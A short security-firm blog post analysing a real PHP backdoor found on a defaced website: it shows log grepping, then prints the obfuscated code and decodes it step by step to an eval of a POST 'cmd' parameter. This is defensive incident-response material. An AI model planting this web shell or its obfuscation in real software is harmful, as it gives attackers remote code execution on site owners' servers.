SBM Labs

Cyber Security Collaboration Project

Simple PHP Backdoor
05 Jul 2017

Your web-site was defaced and position in search results was dropped? Unfortunately you was hacked.

Let's look at real case of success attack.

1. Check web-server logs.

First of all you can search for suspicious POST requests.

# cat ***.log | grep POST | less

Suspicious requests were detected to the script search.extender.inc.php.

2. Check script content.

Suspicious code was detected.

3. Analyze suspicious code.

$avj = str_replace("j","","sjtrj_jrjejpljajcje");
It's the same:
$avj = "str_replace";

$qu = $avj("i", "", "ibiaisie6i4i_dieicoide");
It's the same:
$qu = "base64_decode";

$fh = $avj("k","","crkekatkek_kfkukncktkikon");
It's the same:
$fh = "create_function";

$hwy = $fh('', $qu($avj("c", "", $or.$zs.$lq.$bu))); $hwy();
It's the same:
$hwy = create_function('',base64_decode(str_replace("c","","cIEBldcmFsKCRfUE9TVFsnY21kJ10pOw=="))); $hwy();
$hwy = create_function('',base64_decode("IEBldmFsKCRfUE9TVFsnY21kJ10pOw==")); $hwy();
$hwy = create_function('','@eval($_POST['cmd'];'); $hwy();

It's backdoor. As you see attacker uses parameter "cmd" in POST requests in order to run malicious code.

P.S. Never forget about vulnerability management and use protection technologies. It's should be base exercises in your security program.

Read it OWASP TOP 10 A7 - Insufficient Attack Protection.

Spam-Infected Website
Skype Account Compromise
Protection of CMS Joomla administration panel
Theft of American Express, Visa and MasterCard card data